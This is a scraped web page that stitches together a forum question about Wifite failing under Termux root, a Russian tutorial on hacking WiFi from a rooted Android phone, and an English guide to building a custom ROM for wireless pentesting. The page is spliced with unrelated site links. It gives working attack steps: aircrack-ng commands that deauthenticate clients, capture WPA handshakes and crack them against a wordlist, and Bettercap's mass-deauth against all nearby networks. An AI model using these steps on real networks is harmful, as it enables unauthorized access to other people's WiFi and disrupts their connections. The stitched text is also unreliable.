Wifite termux root

Техника
~/wifite2 # python2 Wifite.py -wpa

   .               .
 .´  ·  .     .  ·  `.  wifite 2.2.5
 :  :  :  (¯)  :  :  :  automated wireless auditor
 `.  ·  ` /¯\ ´  ·  .´  https://github.com/derv82/wifite2
   `     /¯¯¯\     ´

 [+] option: targeting WPA-encrypted networks

 [!] Error: Required app aircrack-ng was not found. install @ https://www.aircrack-ng.org/install.html
 [!] Error: Required app iwconfig was not found. install @ apt-get install wireless-tools
 [!] Warning: Recommended app reaver was not found. install @ https://github.com/t6x/reaver-wps-fork-t6x
 [!] Warning: Recommended app bully was not found. install @ https://github.com/aanarchyy/bully
 [!] Warning: Recommended app pyrit was not found. install @ https://github.com/JPaulMora/Pyrit/wiki
 [!] Warning: Recommended app tshark was not found. install @ apt-get install wireshark
 [!] Warning: Recommended app hashcat was not found. install @ https://hashcat.net/hashcat/
 [!] Warning: Recommended app hcxdumptool was not found. install @ https://github.com/ZerBea/hcxdumptool
 [!] Warning: Recommended app hcxpcaptool was not found. install @ https://github.com/ZerBea/hcxtools
 [!] Warning: Recommended app macchanger was not found. install @ apt-get install macchanger
 [!] At least 1 Required app is missing. Wifite needs Required apps to run
~/wifite2 # apt get install macchanger
Ability to run this command as root has been disabled permanently for safety purposes.
~/wifite2 # exit
exit
~ $ root
~ # apt-get i wireshark
Ability to run this command as root has been disabled permanently for safety purposes.
~ #

The problem is this message that appears «Ability to run this command as root has been disabled permanently for safety purposes.»

~/wifite2 $ python2 Wifite.py -wpa
   .               .
 .´  ·  .     .  ·  `.  wifite 2.2.5
 :  :  :  (¯)  :  :  :  automated wireless auditor
 `.  ·  ` /¯\ ´  ·  .´  https://github.com/derv82/wifite2
   `     /¯¯¯\     ´

 [+] option: targeting WPA-encrypted networks
 [!] error: wifite must be run as root
 [!] re-run with sudo

And when I start without T-root, it appears that Wifite only works with root, I don’t understand what causes this problem.

Взлом WiFi в Termux. Полный разбор!

Termux — one ❤

Нихао! Взлом WiFi — это самая животрепещущая тема на нашем канале. Все об это говорят, но никто не знает, как это провернуть в Termux. Что неудивительно, ведь Termux не является полноценным дистрибутивом Linux.

Более того, для тех кто в танке, чтобы взломать WiFi нужно перевести его в режим монитора. Однако в Android-устройствах из-за аппаратных ограничений доступ к этому режиму закрыт. За это, скажите спасибо вурдалакам из компании Broadcom, которые захватили весь рынок мобильных модулей WiFi.

Именно поэтому, все туториалы на Youtube и других площадках по взлому WiFi c помощью Termux полная туфта! Вы никогда не взломаете WiFi описанными там способами (их делают, чтоб набрать аудиторию).

Этот материал несет ознакомительный характер. Я вас ни к чему не призываю! Задача статьи лишь развлекать. За все противоправные действия вы несете полную ответственность.

Рутировать устройство

Но перед этим, вам необходимо получить root права. Не бойтесь, сейчас это делается за пару часов, а риски сведены к минимуму (вероятность того, что вы превратите свой телефон в кирпич исключена).

Дополнительно:  (РЕШЕНО) Ошибка нарушения сторожевого таймера DPC | Быстро и легко! - Легкий водитель - Ошибка Синего Экрана
Без root прав никак

Я сам таким образом ставил root права, с моим телефоном все хорошо, лагать он не стал, все работает как часы.

Кстати, программы по типу 360Root или Framaroot не работают с Android 6.0.0. Даже не пробуйте, только потеряете время!

Надыбать внешний WiFi адаптер

Как я уже говорил, в большинстве Android устройств используется WiFi модуль от Broadcom, который аппаратно ограничивает доступ к режиму монитора.

Соответственно, нам необходим внешний WiFi адаптер, который поддерживает эту функцию. В рознице (в магазинах типа DNS) вы их не найдете, нужно заказывать на Aliexpress.

Крайне рекомендую заказывать вот такой адаптер Alfa, так как им пользуются все крутые хакеры, специалисты по Информационной Безопасности и ютуберы, а его цена не кусается (в отличие от аналогов).

Кстати, этот адаптер используется для любых манипуляций c WiFi. В том числе, перехват трафика (MITM-атака).

Установить все необходимые пакеты

Подключаем WiFi-адаптер к рутированному телефону, скачиваем Termux в Play Market и прописываем команды.

apt update && apt upgrade

pkg install root-repo

pkg install unstable-repo

pkg install x11-repo

pkg install tsu

pkg install iw

pkg install ethtool

pkg install wireless-tools

pkg install tshark

Также, крайне рекомендую прочитать нашу статью про полную настройку Termux.

Пару слов про взлом WiFi

Существует 3 основных способа взлома WiFi:

  • Похищение handshake (рукопожатия)
  • Подбор wps ключа.
  • Фишинг

Программ для взлома WiFi много, но самая главная — Aircrack-ng.

Установка/запуск Aircrack-ng

pkg install aircrack-ng

Даем Termux root-права (у вас должна появится решетка, вместо доллара)

tsu

airmon-ng check kill

airmon-ng start wlan0

airodump-ng wlan0mon

airodump-ng —bssid [MAC адрес точки доступа – без скобок!] —channel 1 -w wifi wlan0mon

aireplay-ng —deauth 20 -a [MAC точки доступа] -c [MAC подключенного клиента] wlan0mon

wpaclean [ИмяНовогоФайла] [ИмяСтарогоФайла]

aircrack-ng -w [ПутьКСловарю] -b [MAC точки доступа] [ЧистыйХэндшейк .cap]

Что-то не работает? Установите Reaver, pyrit и cowpatty.

Подытожив

Прикол в том, что в интернете просто нет подробных туториолов на эту тему, потому что это геморно, а люди, в своем большинстве, любят нажимать 2 кнопки.

Соответственно, все туториалы, что есть в интернете, это туфта! Они нужны, чтоб набрать аудиторию, а не раскрыть проблему!

По другому WiFi в Termux никак не взломаешь!

Intro

For a while now i wanted to use my Android phone as a mobile (wireless) pentesting device. Unfortunately most tutorials online we’re either incomplete, outdated or just didn’t work. So I’ve decided to write my own tutorial which should work on any unlocked and rooted Android phone.

Update

https://youtube.com/watch?v=RvxySFwUeRA%3Ffeature%3Doembed

Requirements

In order to get this up and running you need two things. A ROM (or kernel) with the correct modules (drivers) installed, and a wireless chip that supports monitor mode. A few chips that support monitor mode are:

  • Atheros AR9271
  • MediaTek MT7601u
  • Ralink RT3070
  • Ralink RT3572
  • Ralink RT5370
  • Ralink RT5572
  • Realtek RTL8812AU
  • Realtek RTL8189FTV
  • Many others
Дополнительно:  Аппаратное ускорение отключено или не поддерживается драйвером |
Some of my wireless dongles

In this tutorial i’m going the use the MediaTek MT7601u from AliExpress.

TECHKEY mini usb wifi adapter 300Mbps USB2.0 wifi antenne wifi usb ethernet wifi dongle 802.11 n/g/b

Smarter Shopping, Better Living! Aliexpress.com

The ROM built process

Dependencies

I’m using Ubuntu 18.04 in this tutorial. Either you have it running bare metal or you’ve installed it in a VM.

sudo apt update && apt upgrade -y

Then we need to install some dependencies for building an Android repo

sudo apt install bc bison build-essential ccache curl flex g++-multilib \
gcc-multilib git gnupg gperf imagemagick lib32ncurses5-dev \
lib32readline-dev lib32z1-dev liblz4-tool libncurses5-dev libsdl1.2-dev \ 
libssl-dev libwxgtk3.0-dev libxml2 libxml2-utils lzop pngcrush rsync \
schedtool squashfs-tools xsltproc zip zlib1g-dev python

Repo download

Now download and install the repo binary

mkdir ~/bin
curl https://storage.googleapis.com/git-repo-downloads/repo > ~/bin/repo
chmod a+x ~/bin/repo
# set PATH so it includes user's private bin if it exists
if [ -d "$HOME/bin" ] ; then
    PATH="$HOME/bin:$PATH"
fi
source ~/.profile

Download the Pixel-Experience repo . This is going to take a while depending on your internet connection

mkdir pixel-experience && cd pixel-experience
repo init -u https://github.com/PixelExperience/manifest -b ten
repo sync -c -j$(nproc --all) --force-sync --no-clone-bundle --no-tags

Device and vendor tree

After it finishes. Download the device/vendor tree and kernel for your device. (mine is xiaomi redmi note 7- lavender)

export USE_CACHE=1
ccache -M 50G
. build/envsetup.sh
lunch aosp_lavender-userdebug

Kernel modification

Now we have to modify the kernel config in order to add support for additional wireless cards.

cd kernel/xiaomi/lavender
export ARCH=arm64
make lavender-perf_defconfig
make menuconfig

Enable loadable module support

  • Enable loadable module support
    • Module versioning support (deselect)
    • Source checksum for all modules (deselect)
    • Module signature verification (deselect)

This is done because if we need to add another module later (kernel only build / make modules) it won’t complain about module signing.

Enable mac80211 and cfg80211 support.

  • Networking support
    • Wireless
      • cfg80211 – wireless configuration API (buit-in select)
      • Generic IEEE 802.11 Networking Stack (mac80211) (module select)

Enable Wireless Lan device support

  • Device Drivers
    • Network device support
      • Wireless LAN
        • Select wireless lan drivers you need (module select)
I’ve added Atheros HTC (ath9k-htc) support
Ralink (rt30xx) support
And Mediatek (mt7601u) support

Now exit and save config and copy the .config to the kernel config location of Pixel-Experience. Again mine is lavender.

cp .config arch/arm64/configs/lavender-perf_defconfig

We need to run a make mrproper for cleaning up the kernel source

make clean && make mrproper

Module edit

Next we need to modify three files, otherwise the mac80211 and atheros modules will fail to build. Which are:

  • kernel/xiaomi/lavender/net/mac80211/mlme.c
  • kernel/xiaomi/lavender/net/mac80211/tx.c
  • kernel/xiaomi/lavender/drivers/net/wireless/ath/regd.c

MAC80211

kernel/xiaomi/lavender/net/mac80211/mlme.c
On line 1343 replace IEEE80211_BAND_60GHZ with NL80211_BAND_60GHZ

kernel/xiaomi/lavender/net/mac80211/tx.c
On line 167 replace IEEE80211_BAND_60GHZ with NL80211_BAND_60GHZ

Atheros

kernel/xiaomi/lavender/drivers/net/wireless/ath/regd.c
On line 670 and 672 replace IEEE80211_BAND_2GHZ with NL80211_BAND_2GHZ

Built the ROM

Now we can build the ROM for flashing onto the phone. This can take a long time depending on your processor. On my AMD 3700x it took 45 minutes.

Дополнительно:  Что сделать, чтобы ноутбук не тормозил

Start the build in the root of the Pixel-Experience directory with:

mka bacon -j$(nproc --all)

After the build finishes successfully you should have a ROM zip in your output directory.

ls out/target/product/lavender

Flash the ROM

Now we can flash this ROM and Magisk (root app) onto the phone. Assuming the phone has an unlocked bootloader and TWRP recovery installed.

Magisk

After the phone boots go through the usual setup (wifi, google account etc) then go to magiskmanager.com to download and install Magisk Manager.

If successful it should look like this

Termux

So what we’ve achieved so far is that we have a rooted Android phone with the proper modules installed. Next we need to install Termux and the Kali Nethunter chroot to take advantage of the huge pentesting software collection Kali offers. Although i’m only going to use Wifite and Bettercap in this example.

Install Termux through the Google Playstore and start it up

In Termux first update

pkg update

Then install the root-repo

pkg install root-repo

Load the modules

Now we can load the wireless modules

tsudo /system/bin/modprobe -d /vendor/lib/modules/ ath9k-htc
tsudo /system/bin/modprobe -d /vendor/lib/modules/ mt7601u

To load the modules at Termux startup create a script called m.sh

pkg install nano
nano m.sh
#!/bin/bash

export PATH=&PATH:/system/bin/

modules="/vendor/lib/modules/"

tsudo modprobe -d $modules ath9k-htc
tsudo modprobe -d $modules rt2800usb
tsudo modprobe -d $modules mt7601u

Make m.sh executable and edit bashrc

chmod +x m.sh
nano ~/.bashrc

Add this line to bashrc

bash m.sh

Kali

Now that module loading is setup correctly we can proceed to download Kali Nethunter installer script

curl -LO https://raw.githubusercontent.com/Hax4us/Nethunter-In-Termux/master/kalinethunter

Install Kali Nethunter

chmod +x kalinethunter
./kalinethunter

Start Kali Nethunter

tsudo startkali

Apt update & upgrade

apt update && apt upgrade -y

Wifite

After upgrading Kali we’re ready to proceed to install Wifite. If you’re not familiar with Wifite it’s a handy tool to probe surrounding wireless networks with different kinds of attack.

  • PMKID – Clientless WPA PSK capture
  • WPA – Standard deauth PSK capture
  • WPS – Pixiedust/Bully WPS attack
  • WEP – Weak IV’s
  • etc
apt install wifite bully pyrit macchanger hcxtools hcxdumptool
wifite

Bettercap

Optionally you can install Bettercap. Bettercap is the swiss army knife when is comes to (wireless) networks and has a neat mass deauth script. (which captures handshakes)

apt install bettercap bettercap-ui bettercap-caplets
bettercap -iface wlan1 -caplet http-ui

On your phone point your browser to: http://127.0.0.1

In the caplets tab on top of your screen there is a caplet called “mass-deauth”. Select it and click on the “play button”

Bettercap will start to search for wireless networks and it’s clients and capturing handshakes by deauthing all of them.

Captured handshakes will be stored in the hs directory. Convert these cap files to hccapx with cap2hccapx for use with Hashcat.

So that’s it. A fully functioning mobile pentesting device built with your own ROM.

PayPal

If you like my work, please support me

Оцените статью
Master Hi-technology
Добавить комментарий